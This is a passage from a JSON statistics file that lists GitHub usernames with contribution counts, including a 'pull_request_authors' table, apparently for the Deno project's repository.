g":1,"Revadike":1,"Byrbl":1,"LynnKirby":1,"plutonium-239":1,"RuiNtD":1,"dr1ss":1,"Anderson-SG":1,"WilfSilver":1,"Frooastside":1,"siff-duke":1,"bakkot":1,"berendjansen91-stack":1,"benjiwolff":1,"bdevos":1,"egasimus":1,"betafcc":1,"dpclark4":1,"Sicmatr1x":1,"maor-benami":1,"dadepo":1,"ubdjshdb":1,"Riders004":1,"rattrayalex":1,"edwillard":1,"magic-akari":1,"callionica":1,"jiridanek":1,"BriSeven":1,"dylanellington":1,"yegwheel":1,"nirnay-raval-st10":1,"monwarqx1250":1,"nikitavoloboev":1,"nekodendislike":1,"saravanan10393":1,"paul-sachs":1,"ashah888":1,"Benaiah":1,"infiniteregrets":1,"DataM0del":1,"arite":1,"quat1024":1,"RonnyChan-okta":1,"sorenlouv":1,"eriklz":1,"lidessen":1,"danthegoodman1":1,"Joel-PeakMetrics":1,"matthewleon":1,"smcenlly":1,"ishmam-mahmud":1,"liamfd":1,"Jean-Baptiste-Lasselle":1,"bak-fts":1,"Janhouse":1,"StoneStackStudio":1,"rosahaj":1,"brlewis":1,"peterwangfeng":1,"Benjiko99":1,"tsaxking":1,"penny-paypay":1,"phant0m2290":1,"angelnext":1,"kuboon":1,"arthurwolf":1,"zedd3v":1,"Vasu2499":1,"nscott":1,"publictheta":1,"1yefuwang1":1,"nomadshiba":1,"pixeleet":1,"smndtrl":1,"Gabryx64":1,"hide-own":1,"jfernandez":1,"m-dressler":1,"zxanderh":1,"bobcallaway":1,"wldhg":1,"mertcanaltin":1,"PauTym":1,"yakc":1,"grimly":1,"L4G-wbsg":1,"ExposedCat":1,"togakangaroo":1,"regseb":1,"audetto":1,"sevenc-nanashi":1,"effigies":1,"lunsdorf":1,"LenAnderson":1,"crohncapstan":1,"IKatsuba":1,"Boulea7":1,"sambrtg":1,"iMarv":1,"foufrix":1,"carragom":1,"erisanolasheni":1,"monotter":1,"chengr4":1,"matheusgr":1,"brettchalupa":1,"hen-x":1,"SviatoslavMJS":1,"jonasfrey":1,"jareddr":1,"Pii-USD":1,"mandy8055":1,"anjmao":1,"ghostflyby":1,"KohnoseLami":1,"carloslfu":1,"jefripunza":1,"sbgss":1,"EFISHJ2":1,"JanPokorny":1,"mcodik":1,"zxch3n":1,"frankbakulov":1,"j50n":1,"Nautigsam":1,"hello-there-world1":1,"fxrysh":1,"JanGabrielqqq":1,"shannon":1,"JamesClarke7283":1,"Mxa30":1,"mysteryjeans":1,"lcrespilho":1,"RisaI":1,"gluethane":1,"augustsaintfreytag":1,"pringshia":1,"wickedknock":1,"Almenon":1,"csjh":1,"Runkunkun":1,"anishkny":1,"MikuroXina":1,"mishkinf":1,"ksed":1,"comods":1,"GiveMeFox":1,"john-":1,"janos-r":1,"BanDroid":1,"kyee-rs":1,"BeroBurny":1,"wxhuang":1,"curtislarson":1,"szcharlesji":1,"BuyMyBeard":1,"j0sh":1,"SerJaimeLannister":1,"moritztim":1,"tgross35":1,"retraigo":1,"pheuter":1,"albel727":1,"trgwii":1,"borkdude":1,"insuns":1,"chrisands":1,"chiddekel":1,"omararturo":1,"chyzwar":1,"sewakghali":1,"paleocastro":1,"luisfagottani":1,"n8jadams":1,"aegooby":1,"DevScholar":1,"reggi":1,"BobFrankston":1,"CetinSert":1,"forcingFunction":1,"rlidwka":1,"swiftsword94":1,"mccraigmccraig":1,"drmercer":1,"g-plane":1,"michieltebraake":1,"TriMoon":1,"beriberikix":1,"Foxchandaisuki":1,"amitlevy21":1,"devz00":1,"Zartust":1,"harshmangalam":1,"shouples":1,"TheHans255":1,"theokeist":1,"bodograumann":1,"iahu":1,"junichi-chiba":1,"Malix-off":1,"dmoebius":1,"jakeg":1,"Summertime":1,"tavindev":1,"ryanmiville":1,"danimrangelb":1,"Drakim":1,"usamaamjid":1,"agamm":1,"introspection3":1,"raisercostin":1,"SebastienGllmt":1,"milahu":1,"theRealProHacker":1,"pawsaw":1,"vanillajonathan":1,"pierredewilde":1,"dsseng":1,"narcisgarcia":1,"helloryuko":1,"prasannavl":1,"iownbey":1,"b-snel":1,"cj-1010-1414":1,"jdsampayo":1,"eser":1,"punarinta":1,"jodinathan":1,"shaz-r":1,"maxbrieiev":1,"benmccann":1,"bolatuly":1,"KTibow":1,"TradeIdeasPhilip":1,"rahul0x00":1,"SamuelLeclerc33":1,"brad-jones":1,"Eeemil":1,"IsaacThoman":1,"castrogarciajs":1,"iceghost":1,"hyrious":1,"aW4KeNiNG":1,"davideperozzi":1,"shreyassanthu77":1,"brookback":1,"Jemory-git":1,"lpinca":1,"rwillsonAxiom":1,"softwarespot":1,"fzn0x":1,"roziscoding":1,"Mr-Arthur-White":1,"uhyo":1,"itohatweb":1,"trivikr":1,"GeorgeNavQS":1,"gautejohan":1,"ulken":1,"jefbarn":1,"charsleysa":1,"zloirock":1,"jwulf":1,"seogrady":1,"Atanu484":1,"BastiDood":1,"cenfun":1,"404Wolf":1,"soyboi":1,"slydor":1,"g4yamanaka":1,"Yootonn":1,"c43721":1,"acedward":1,"Horki":1,"xqm32":1,"pascalav":1,"mbrahimi02":1,"BinaryShrub":1,"Drag13":1,"bradenmacdonald":1,"laverdet":1,"TimNN":1,"bneijt":1,"jithujoshyjy":1,"fallible-algebra":1,"bradleyboy":1,"vacavaca":1,"jacKchw":1,"petersalas":1,"rodryquintero":1,"maxeonyx":1,"lucasfernog-crabnebula":1,"MohammadSu1":1,"verikono":1,"manikawnth":1,"adakite1":1,"jacob-shuman":1,"joscha":1,"ladauze":1,"raucao":1,"rajsite":1,"Iuriiiii":1,"ylor":1,"SSFRPA":1,"tommylau-exe":1,"Eetezadi":1,"caperaven":1,"kasperstorgaard":1,"kurtextrem":1,"tatsuya6502":1,"benlavalley":1,"MrMysterius":1,"planetoryd":1,"timepp":1,"Marcisbee":1,"rudxde":1,"thedtvn":1,"jfancher":1,"AliReza99":1,"argshook":1,"fightbulc":1,"Lonniebiz":1,"MarcCoquand":1,"mavdotj":1,"mcpbay":1,"ar37-rs":1,"JonaAnders":1,"saibotk":1,"ZakaHaceCosas":1,"callmephilip":1,"Chrisstar56":1,"MauriceAndre":1,"joshcanhelp":1,"qti3e":1,"starrematte":1,"drernie":1,"IncognitaDev":1,"devsnek":1,"WillsterJohnson":1,"NaitLee":1,"losfair":1,"daisseur":1,"juli1":1,"tamusjroyce":1,"AndresPrez":1,"tsirysndr":1,"SBoudrias":1,"evilmonkey19":1,"doga":1,"sformel-usgs":1,"Catsvilles":1,"exside":1,"joehillen":1,"AhmedElTabarani":1,"elmarsto":1,"marksvc":1,"umajho":1,"thosil":1,"tv-rajesh":1,"dkolba":1,"seanwatters":1,"wooffie":1,"shellcromancer":1,"BearD01001":1,"imfing":1,"asantos00":1,"mbatc":1,"jeckhart":1,"AlexanderOMara":1,"DanieliusDev":1,"unimonkiez":1,"0xharshrastogi":1,"ydcjeff":1,"bogeychan":1,"Thechi2000":1,"greentore":1,"levibostian":1,"erictaylor":1,"louisabraham":1,"PTPhongKMF":1,"himself65":1,"maelp":1,"mar-kub":1,"darcien":1,"fnune":1,"hammamabughali":1,"sdankel":1,"Auxy6858":1,"mansooranis":1,"patrickReiis":1,"yamavol":1,"kimdcottrell":1,"davbrito":1,"johnseth97":1,"Alastyr":1,"Ghost4Man":1,"shirok1":1,"jbu4github":1,"vkarpov15":1,"delusionsGH":1,"cleanremote":1,"hgruniaux":1,"fengyunzaidushi":1,"speedfighter":1,"laakal":1,"luanargolodev":1,"buttercubz":1,"x7NFKCgJ":1,"M3cubo":1,"yyq1025":1,"jaredkrinke":1,"aphofstede":1,"sonickseven":1,"Nugine":1,"alcuadrado":1,"osdevisnot":1,"matthewp":1,"noncom":1,"kechako":1,"sahandevs":1,"Krutsch":1,"cjdell":1,"callumgare":1,"xz-dev":1,"tacascer":1,"JonathanWilbur":1,"skywalker512":1,"maximousblk":1,"Houndie":1,"Kayxue":1,"aditi-shah-st1":1,"benz0li":1,"bira37":1,"jeydi243":1,"BWKC":1,"i18nsite":1,"nightlyistaken":1,"TreetopFlyer":1,"afinch7":1,"KatsutoshiOtogawa":1,"Momoshikin":1,"j-murata":1,"shpunter":1,"nabsei":1,"joshsmonta":1,"matilda-ray-kerria":1,"kadiryazici":1,"zhaowan-hub":1,"kylebarron":1,"n9":1,"vanpipy":1,"voluntadpear":1,"deadcoder0904":1,"katlyn":1,"melonchucker":1,"jceb":1,"paulhendrix":1,"ivpdev":1,"Nexus-00":1,"liigo":1,"marc2332":1,"0xNF":1,"wrnrlr":1,"jeanp413":1,"khrj":1,"TillaTheHun0":1,"rgl":1,"bloomler":1,"tukkek":1,"Vandivier":1,"nyannyacha":1,"da1suk8":1,"ascorbic":1,"LuckyHookin":1,"frixaco":1,"gTALAMANTES":1,"muuvmuuv":1,"tungv":1,"fedgrant":1,"totto2727":1,"Munrok":1,"dvalnn":1,"imaaquibali":1,"mysterycommand":1,"ArthurS1":1,"fedya-eremin":1,"philkunz":1,"aprosail":1,"jednano":1,"al20ov":1,"fzs111":1,"dineshdb":1,"kswope":1,"LukeChannings":1,"eduardoboucas":1,"nzakas":1,"tianalemesle":1,"mrmcc3":1,"wergat":1,"DPOH-VAR":1,"chocolateboy":1,"shizonic":1,"stabai":1,"itspa1":1,"Hurtak":1,"uditkarode":1,"bo0tzz":1,"jkasevits":1,"SuperninjaXII":1,"kenballus":1,"KallynGowdy":1,"jjallaire":1,"darksinge":1,"shyguy1412":1,"Justiceleeg":1,"char8x":1,"Antonio476587":1,"AtomicGamer9523":1,"jsb188":1,"vwkd":1,"razcore-rad":1,"hedefalk":1,"masnagam":1,"sebhildebrandt":1,"dguggemos":1,"AlexAnimateMp4":1,"hrbrmstr":1,"jdmerinor":1,"hastebrot":1,"ashishkujoy":1,"btakita":1,"kantbtrue":1,"belakun":1,"jfdarveau":1,"kraabrsg":1,"grumpOldman":1,"dciccale":1,"yisar":1,"ezdac":1,"whs":1,"Lohann":1,"theswerd":1,"haru0017":1,"blessbygod":1,"mousetail":1,"hanrea":1,"bentinata":1,"Skn0tt":1,"RobertCraigie":1,"dsissitka":1,"richardvanbergen":1,"ericvergnaud":1,"asgr-dk":1,"thenhnn":1,"palmm":1,"EGAMAGZ":1,"trusktr":1,"emotilla":1,"Aziz-TheDarkCode":1,"GroophyLifefor":1,"ewired":1,"AFatNiBBa":1,"melbinjp":1,"omar2205":1,"MrSharpp":1,"emrul":1,"David200337":1,"ArakawaHenri":1,"usualoma":1,"lifegit":1,"mhio":1,"mcioffi":1,"usmanh333":1,"robert12r":1,"bassamanator":1,"laurencebedford":1,"vanppo":1,"ul0gic":1,"spaceexperiment":1,"rwols":1,"summer-boythink":1,"idranme":1,"baoshan":1,"hakkanicko":1,"Kukusik8":1,"thomas-lysens":1,"brlim":1,"strager":1,"j-Cis":1,"Rocknerve":1,"shine-on-me":1,"Swimburger":1,"kylehendricks":1,"bittere":1,"uaeio":1,"carafelix":1,"niklasmtj":1,"mikeyamato":1,"marcinjahn":1,"mostafah":1,"swyo":1,"datadrivn1":1,"Jakob5358":1,"caoccao":1,"LucienLeMagicien":1,"cdoremus":1,"Xyndra":1,"mikeal":1,"jwanner83":1,"WerdoxDev":1,"cb-fred":1,"Badg":1,"Justsnoopy30":1,"bxantus":1,"RealityAnomaly":1,"Rajrup-TransEV":1,"jimisaacs":1,"ari-becker":1,"artemik":1,"peruibeloko":1,"Nemo64":1,"weartist":1,"JakeChampion":1,"harrison3000":1,"m10rten":1,"plauk":1,"jason919":1,"BAKFR":1,"Unkn0wn0x":1,"gabobaxx":1,"foster-hangdaan":1,"htammen":1,"daniellionel01":1,"Garciat":1,"bolekk":1,"wiledal":1,"arthur-ver":1,"aiotter":1,"bijeebuss":1,"cfjello":1,"willnewby":1,"DanielRamosAcosta":1,"ben196888":1,"DreamZhou":1,"castarco":1,"role-end":1,"StreetStrider":1,"sylwesterdigital":1,"jjcastro":1,"AbmSourav":1,"vikashsharma":1,"Gekuro":1,"hirochachacha":1,"thejoelw":1,"sabberworm":1,"Maluscat":1,"Qoyyuum":1,"BppleMan":1,"makovkins":1,"MauScheff":1,"pkb-pmj":1,"GitonioDev":1,"Taha-daboussi":1,"Xiaoqiush81":1,"alexbevi":1,"likea-boss":1,"rjbudzynski":1,"divinepaul":1,"nursenakrbs":1,"yuchiXiong":1,"carlocab":1,"WWRS":1,"thenameisluk":1,"danieledapo":1,"rbasto1":1,"wcygan":1,"jamesbradlee":1,"DANser-freelancer":1,"patchthecode":1,"halfmonty":1,"dinethk":1,"roelentless":1,"pinghe":1,"greenhat616":1,"fibibot":1,"daalfox":1,"GerkinDev":1,"adesh9201":1,"grant0417":1,"zhmushan":1,"steveadams":1,"dpeter99":1,"temeddix":1,"gr00nd":1,"haze":1,"lgarron":1,"mike-lischke":1,"masakielastic":1,"avallete":1,"GavinRay97":1,"wrishaa":1,"tareasR":1,"ah-yu":1,"botikho":1,"RodrigoTomeES":1,"pvormittag":1,"HadaIonut":1,"akgurjar":1,"intentionally-left-nil":1,"aalvarado":1,"WardCunningham":1,"chrisnurse":1,"i-api":1,"voltrevo":1,"GunnerGuyven":1,"Briscoooe":1,"rd--":1,"danielfroz":1,"luvies":1,"Tenuka22":1,"carlosala":1,"breezy-badger":1,"caisah":1,"sidd":1,"jasonford":1,"ch99q":1,"hammerlink":1,"limwa":1,"Flimm":1,"Milner39":1,"ErfanNaz":1,"wyatt-herkamp":1,"cy6erskunk":1,"jryom":1,"ryn9":1,"gustawdaniel":1,"jordangarside":1,"Playyo807":1,"mirairoad":1,"calebegg":1,"gowoonhae":1,"Gapostigo":1,"asdfjklkk":1,"mavdotjs":1,"retog":1,"OdenShirataki":1,"shapirone":1,"jtpio":1,"Classy-Bear":1,"Dimtime":1,"jakearchibald":1,"liamdiprose":1,"xubaiwang":1,"michaelhthomas":1,"machineghost":1,"laurie71":1,"enjoyandlove":1,"zhangyuannie":1,"0kku":1,"mguetschow":1,"echoptic":1,"rafaelcalpena":1,"andre4ik3":1,"hpandelo":1,"diecodev":1,"sebastianjnuwu":1,"dhardtke":1,"appujet":1,"txiklerr":1,"hongkongkiwi":1,"geezer78":1,"devsou-com":1,"hsl0":1,"jradxl":1,"dianestephens":1,"uptownhr":1,"frey-mz":1,"ScreamZ":1,"AllySummers":1,"mohammadhosseinmoradi":1,"AhmedOsman101":1,"Not-A-Normal-Robot":1,"sobanieca":1,"karelklima":1,"aukeroorda":1,"uasi":1,"MrYellowSock":1,"lcswillems":1,"captainjapeng":1,"maekoos":1,"nomocas":1,"CAYdenberg":1,"abflow":1,"Jonaskop44":1,"totorubianto":1,"hchengting":1,"BoxenOfDonuts":1,"KegenGuyll":1,"sdegutis":1,"27escape":1,"ralfstx":1,"Young-Lord":1,"mogwai-dev":1,"alexd6631":1,"prabhu":1,"seriousme":1,"pranavgupta-dev":1,"leontastic":1,"arjunyel":1,"ebremer":1,"wongjiahau":1,"XYCode-Kerman":1,"Ionaru":1,"tarasglek":1,"hamlim":1,"nsf":1,"rinshadka":1,"shirshak55":1,"georgekolasa":1,"MRYingLEE":1,"esthedebeste":1,"cristian-spiescu":1,"hhopkins95":1,"SourceR85":1,"ActuallyHappening":1,"vveisard":1,"josephwynn-sc":1,"enjikaka":1,"jgibo":1,"ChromaLTS":1,"awunnenb":1,"laurhinch":1,"MarcelloPaiva":1,"martin-braun":1,"lucidNTR":1,"maxbeech":1,"BogdanRaicevic":1,"Mic-R":1,"alaminkouser":1,"llllOllOOll":1,"gigazach":1,"mary-ext":1,"deer":1,"arkei1":1,"waterblower":1,"bleaklake":1,"thdoan":1,"callumthomson":1,"HoldYourWaffle":1,"srackham":1,"canac":1,"JorensM":1,"IgorM867":1,"treefitty":1,"tjjfvi":1,"tlockney":1,"oq-x":1,"rahbari":1,"tzeepee":1,"Tsukina-7mochi":1,"julienp":1,"gvelim":1,"rafrafek":1,"pokatomnik":1,"zachleat":1,"akriegman":1,"hyperpolymath":1,"EthanThatOneKid":1,"Makoehle":1,"Stromberg":1,"TristanCacqueray":1,"zhanghengxin":1,"josezea":1,"zoonderkins":1,"spixy":1,"philipheinser":1,"tawfekov":1,"nktkas":1,"reverse-banana":1,"harrytruong":1,"gtothesquare":1,"bakasmarius":1,"bfaulk96":1,"BlasterM2A":1,"wrongbyte":1,"NogrTL":1,"Anthony2be":1,"kenos1":1,"tiagosiebler":1,"ahmetcanozcan":1,"vbudovski":1,"71":1,"js-writer":1,"jonmmease":1,"matt1":1,"alexnygren":1,"pcarrier":1,"matart15":1,"michaelhazan":1,"jamsinclair":1,"marcelocra":1,"linuxwolf":1,"macdevign":1,"tjcrowder":1,"watertreestar":1,"LiviaMedeiros":1,"hosseinalipour":1,"numb86":1,"Almaju":1,"csAugust":1,"gradylink":1,"Ayfri":1,"sudokit":1,"rwieruch":1,"fazil47":1,"HasanAlrimawi":1,"kuuote":1,"terrywh":1,"abdurahmanshiine":1,"jkdmyrs":1,"Massayu":1,"CGQAQ":1,"luizfilipe":1,"Bidek56":1,"gaui":1,"foobar-maker":1,"johandalabacka":1,"OoDeLally":1,"Vittitow":1,"cezaryszymanski":1,"tmkx":1,"deretame":1,"rusty-jules":1,"nczsl":1,"43081j":1,"akosma":1,"d70-t":1,"DevSDK":1,"anmoti":1,"tjoskar":1,"AaronM04":1,"7xa5h":1,"VanessaMillich":1,"arciisine":1,"sfrieske":1,"godotdot":1,"hildjj":1,"mahdiyari":1,"Albretch-Mueller":1,"wtchen":1,"cametan":1,"AndisGrossteins":1,"rafaelbdb":1,"litao9238":1,"carere":1,"hironichu":1,"ButterDebugger":1,"nekdolan":1,"michael-aldridge-pozlo":1,"Jolg42":1,"bpevs":1,"StoneCypher":1,"JarekToro":1,"axetroy":1,"xiaoas":1,"Spioune":1,"idkidk000":1,"JROliver3":1,"eranhirsch":1,"bgenia":1,"thomaswelter":1,"ptrxyz":1,"J053Fabi0":1,"alikia2x":1,"ddavid67":1,"ShineZaw123":1,"samegek":1,"gelakhubutia":1,"aglundahl":1,"mathiasrw":1,"newtack":1,"Chooks22":1,"dschissler":1,"jeffreyvdhondel":1,"ellis":1,"NextLegacy":1,"lucastonelli":1,"MickeL":1,"ammubhave":1,"theTechGoose":1,"Hortasha":1,"sithreach":1,"markose":1,"Rychu-Pawel":1,"DannyTaki":1,"tcely":1,"nchevobbe":1,"MGMehdi":1,"luckasnix":1,"litewarp":1,"lowercasebtw":1,"aunyks":1,"noseratio":1,"Driky":1,"Faeranne":1,"coderaiser":1,"nguyenhothanhtam0709":1,"dadooda":1,"Ambyjkl":1,"VKWHM":1,"mrymahmadi":1,"Nerixyz":1,"smunipalli":1,"ptram":1,"evanw":1,"jedwards1211":1,"hrumhurum":1,"K0IN":1,"ayZagen":1,"kada49":1,"reillybrown":1,"TrashP4nda":1,"jackfiszr":1,"Industrial":1,"Paul-Browne":1,"KieranP":1,"aaronhuggins":1,"sanderhahn":1,"dpurge":1,"alanko0511":1,"zadeviggers":1,"jankalfus":1,"byvide":1,"zzaba":1,"MindfulMinun":1,"lordanubi":1,"aMOPel":1,"malivinayak":1,"len0xx":1,"SteelAlloy":1,"Erisfiregamer1":1,"bdashore3":1,"VitHavlik":1,"jirutka":1,"bastianplsfix":1,"yvvki":1,"hesxenon":1,"Gin-Quin":1,"rusher":1,"NiceGuyIT":1,"pouyakary":1,"NeaByteLab":1,"brrock":1,"dsm23":1,"kolay-v":1,"sunsetkookaburra":1,"aGolduck":1,"ozyman42":1,"itsithu":1,"vince-deno":1,"brandonkal":1,"Eyal-Shalev":1,"josephcrawfordSRH":1,"flaviavelosoqueiroz":1,"nokazn":1,"michaelaye":1,"gnattu":1,"amikofalvy":1,"kcastellino":1,"Anutrix":1,"sschneider-ihre-pvs":1,"mitom18":1,"joeldomke":1,"kotkoroid":1,"umgefahren":1,"injust":1,"270556660":1,"bleetube":1,"grqz":1,"hansott":1,"Pinta365":1,"ardabeyazoglu":1,"NehalJadav":1,"mak7an":1,"LordAzyks":1,"LingMessy":1,"faiz-gear":1,"mikozdravkovski":1,"HappyFerry":1,"eythaann":1,"tkafka":1,"ThePrimeagen":1,"AlttiRi":1,"tsndr":1,"ACAlexChen":1,"aLemonFox":1,"gregwhelan":1,"Twinki14":1,"markthree":1,"lunadogbot":1,"adamatat":1,"puzzle-rusher":1,"Mopsgamer":1,"whalderman":1,"xueqingxiao":1,"ityspace":1,"McSneaky":1,"reubenfirmin":1,"contrun":1,"djoooooe":1,"Tech-Vexy":1,"noverby":1,"LaneSun":1,"JohnHoltrane":1,"xet7":1,"patreeceeo":1,"nitrologic":1,"rubenfiszel":1,"yaacovCR":1,"dezlymacauley":1,"brummetj":1,"jldec":1,"k0warite":1,"rishavs":1,"dector":1,"kLiHz":1,"jonek":1,"lalalaleo":1,"brianpeiris":1,"mono0x":1,"Nelfimov":1,"kotkifotki":1,"Hehongyuanlove":1,"GlowyGhost":1,"nicu-chiciuc":1,"cyruseuros":1,"davepeck":1,"jhheider":1,"Xuhv":1,"milohansen":1,"wellwelwel":1,"hertzg":1,"krupper":1,"Ryuka25":1,"levino":1,"Heziode":1,"conor-fearon":1,"apacheli":1,"sgurijala9":1,"filipmares":1,"big-yellow-duck":1,"kamekyame":1,"dev-victoria":1,"lluchs":1,"harshvijaykumarrawat":1,"kellnerd":1,"GuzlejM":1,"aapoalas":1,"cptpiepmatz":1,"oxygen":1,"jerebtw":1,"eikmei":1,"predators46":1,"bluezip":1,"thonkinator":1,"otyebis":1,"elizeuangelo":1,"allyburg":1,"aKuad":1,"ole":1,"vis97c":1,"grafluxe":1,"d4h0":1,"amadsen":1,"jviide":1,"dnsco":1,"cu8code":1,"ivan-kleshnin":1,"mohsen1":1,"revival0728":1,"rahulmr":1,"MARCROCK22":1,"caijw":1,"rodyzi":1,"jonasstrehle":1,"resetko":1,"tracker1":1,"fernandolguevara":1,"karl-run":1,"wsporto":1,"RedKnight6986":1,"highmountaintea":1,"creonico":1,"hb20007":1,"DinoChiesa":1,"webbower":1,"John-Dean":1,"m1sk9":1,"hexchain":1,"marrus-sh":1,"stefandevo":1,"bixu":1,"cshaa":1,"MarkStega":1,"anjuu-gst":1,"javihernant":1,"miksula":1,"utenma":1,"DeeGeeMan":1,"lygstate":1,"mlilback":1,"hw104":1,"cbgbt":1,"dz4k":1,"BeyramTaglietti":1,"butadpj":1,"flo-jan":1,"gcxfd":1,"d-gubert":1,"astralstriker":1,"EduM22":1,"rherrmann":1,"Dania99dev":1,"devlopersabbir":1,"manyuanrong":1,"Tyrone":1,"r-thomson":1,"Songkeys":1,"hexmode":1,"drivasperez":1,"Andriamanitra":1,"sebdanielsson":1,"dityaaa":1,"luiskugel":1,"rkulinsky":1,"Souvlaki42":1,"amm834":1,"TobyEalden":1,"Sorikairox":1,"AliBasicCoder":1,"LeoMartinDev":1,"cs50victor":1,"mikoloism":1,"spocki":1,"TheAyes":1,"spendres":1,"PodaruDragos":1,"gaoxiaoliangz":1,"dev-nicolaos":1,"ankrgyl":1,"GoldsteinE":1,"yibe":1,"RealScrappyDev":1,"NyaightHazard":1,"ngocdvspace":1,"doronoded":1,"gr7d":1,"wbehrens-on-gh":1,"shinshin86":1,"0xkalle":1,"usz-or":1,"hronro":1,"iamvitalyo":1,"twihno":1,"bageren":1,"theHoracle":1,"rossholdway":1,"Think-M":1,"aofldl":1,"bbak":1,"zdila":1,"ChristianGrete":1,"SpadeAceman":1,"koenvanzuijlen":1,"razzeee":1,"gazerro":1,"fproske":1,"tkiapril":1,"ollien":1,"baaabaaayaaagaaa":1,"paulcdejean":1,"Obscrts":1,"pixel-toys-chris-evans":1,"mattiasrunge":1,"lazarv":1,"skimhugo":1,"kylewillmon":1,"mojtabll":1,"davlgd":1,"startswithaj":1,"332123342":1,"edgeadjei":1,"hemedani":1,"mikecasinghino":1,"dkfdkdodkms":1,"CrazyboyQCD":1,"cirolosapio":1,"gflarity":1,"TheCarpetMerchant":1,"tobias47n9e":1,"ksesong":1,"aotoriii":1,"takeseem":1,"jordinl":1,"gching":1,"Sparkenstein":1,"Bannerets":1,"SuperManito":1,"DiegoT4l":1,"joy-stacks":1,"geglock":1,"NSExceptional":1,"finlaydotb":1,"Kenya-West":1,"zhaofs":1,"darkship":1,"hanakla":1,"zweizeichen":1,"shadowspawn":1,"diamondsw":1,"gimbles":1,"morrisvdbeek":1,"tennashi":1,"bcdavasconcelos":1,"fwsGonzo":1,"ThinkingPlanely":1,"reallyTG":1,"jdocksey":1,"WingZer0o":1,"mathieubellon":1,"jabed-dev":1,"CobyPear":1,"BrunoBernardino":1,"kousherAlam":1,"beetcb":1,"cfraz89":1,"spartanatreyu":1,"pamoller":1,"dotm4x":1,"yogeshdofficial":1,"mommysgoodpuppy":1,"xl-soft":1,"DavidDTA":1,"chris-dco":1,"fraidev":1,"josiahsrc":1,"fel1x-developer":1,"ivypuckett":1,"kigiri":1,"TooTallNate":1,"anko9801":1,"Qubut":1,"ymeine":1,"sudanchapagain":1,"ozwaldorf":1,"olivierdagenais":1,"bebraw":1,"torelode":1,"JTRNS":1,"Jay-Karia":1,"bendechrai":1,"liruifengv":1,"RobertAKARobin":1,"MariusVatasoiu":1,"Indyandie":1,"sevmonster":1,"elimydlarz":1,"invalidred":1,"hamidrezakp":1,"michal-minich":1}},"pull_request_authors":{"table":{"bartlomieju":1571,"dsherret":1449,"littledivy":811,"nathanwhit":630,"nayeemrmn":478,"iuioiua":466,"kt3k":377,"mmastrac":335,"denobot":290,"crowlKats":271,"marvinhagemeister":245,"lucacasonato":233,"devsnek":166,"satyarohith":121,"petamoriken":120,"divybot":82,"crowlbot":65,"Tango992":53,"jbronder":50,"magurotuna":46,"irbull":42,"HasanAlrimawi":42,"yazan-abdalrahman":40,"ry":39,"thisisjofrank":38,"nathanwhitbot":33,"Hajime-san":28,"linbingquan":27,"dependabot[bot]":27,"igorzi":25,"losfair":25,"MohammadSu1":23,"marcosc90":22,"gitstart-app[bot]":19,"0f-0b":19,"fibibot":19,"aapoalas":19,"lunadogbot":19,"gopoto":16,"CyanChanges":16,"Rohan5commit":14,"sigmaSd":14,"lrowe":14,"chirsz-ever":14,"rgbkrk":14,"VlkrS":13,"CertainLach":13,"lowlighter":13,"theswerd":13,"g-plane":13,"edilson258":13,"seanmonstar":11,"tomas-zijdemans":10,"yuxi-ovo":10,"lino-levan":10,"philhawksworth":10,"piscisaureus":9,"lczerniawski":9,"andreubotella":9,"DanieleAurilio":8,"kamilogorek":8,"MujahedSafaa":7,"efekrskl":7,"JoviDeCroock":7,"yyq1025":6,"scarf005":6,"e3dio":6,"lucasfernog-crabnebula":6,"lukeed":6,"Hixie":6,"nkaradzhov":6,"manzt":6,"sgasho":6,"muthu90tech":6,"levex":6,"ryuapp":6,"rathodkunj2005":6,"0hmX":6,"rex4539":5,"KnorpelSenf":5,"zebreus":5,"mash-graz":5,"minato32":5,"kingsword09":5,"load1n9":5,"muddlebee":5,"birkskyum":5,"rnbguy":5,"yazan-nidal":5,"arnauorriols":5,"jespertheend":5,"rscarson":5,"willnewby":5,"letianpailove":5,"ckrassow":4,"hack3ric":4,"cions":4,"zph":4,"turansky":4,"easrng":4,"siaeyy":4,"aaron-ang":4,"bp7968h":4,"iamrajhans":4,"Cre3per":4,"rotu":4,"kitsonk":4,"JakeChampion":4,"hamidrezakp":4,"Milly":4,"JasperVanEsveld":4,"filipstev":4,"jerome-benoit":4,"adamgreg":4,"fbaltor":4,"akabarki76":4,"jake-abed":4,"badgerbees":4,"aduh95":4,"melbourne2991":4,"lilnasy":4,"dovakin0007":4,"raashidanwar":4,"yuhr":4,"Medo-ID":4,"catuhana":4,"0xIchigo":4,"familyboat":4,"canac":3,"seroperson":3,"johnspurlock-skymethod":3,"lu-zero":3,"janosh":3,"maxxcs":3,"caleblloyd":3,"yazanabdalrahman":3,"xingzihai":3,"nberlette":3,"JLCarveth":3,"panva":3,"viktormarinho":3,"ddevilz":3,"sbmsr":3,"csvn":3,"SebastienGllmt":3,"uncomfyhalomacro":3,"boyeln":3,"dandv":3,"stefnotch":3,"M4RC3L05":3,"jtpio":3,"andyvu923":3,"nicolo-ribaudo":3,"finleyjb":3,"AaronO":3,"paolobarbolini":3,"cppcoffee":3,"Brooooooklyn":3,"MLuc24":3,"vmg-dev":3,"alexgleason":3,"qti3e":3,"egfx-notifications":3,"MikaelUrankar":3,"deepshekhardas":3,"maximiliankolb":2,"TateKennington":2,"njhanley":2,"wafuwafu13":2,"bram209":2,"zino23":2,"wahajahmed010":2,"7Hazard":2,"mstysk":2,"bobcallaway":2,"yacinehmito":2,"DonJayamanne":2,"ConnorDiddy":2,"nestarz":2,"LaplaceXD":2,"ZayanKhan-12":2,"ingalless":2,"DerZade":2,"xyber-nova":2,"ArmaanAS":2,"marshallwalker":2,"theRealProHacker":2,"milahu":2,"ankon":2,"kennysliding":2,"jcbhmr":2,"sanjibani":2,"solb":2,"await-ovo":2,"yibe":2,"welfuture":2,"wperron":2,"ricfrst":2,"tannal":2,"Meir017":2,"king8fisher":2,"JonathonRP":2,"LiviaMedeiros":2,"nglmercer":2,"jamsinclair":2,"sahilmob":2,"nokazn":2,"wuurrd":2,"jirutka":2,"LoganTylerPatterson":2,"diegoholiveira":2,"primoze":2,"Rychu-Pawel":2,"appden":2,"SyntaxBlitz":2,"printfn":2,"WWRS":2,"dan-j":2,"pjuftring":2,"EdamAme-x":2,"JimBuzbee":2,"nagromc":2,"wooseok123":2,"Giesch":2,"lucab":2,"vedant-pandey":2,"scarab-systems":2,"codepage949":2,"oscarotero":2,"marcomow":2,"futsuuu":2,"Boulea7":2,"wangfeng1994":2,"rivy":2,"jeff-hykin":2,"treasury1203":2,"AlvaroParker":2,"Piroro-hs":2,"bellinitte":2,"cp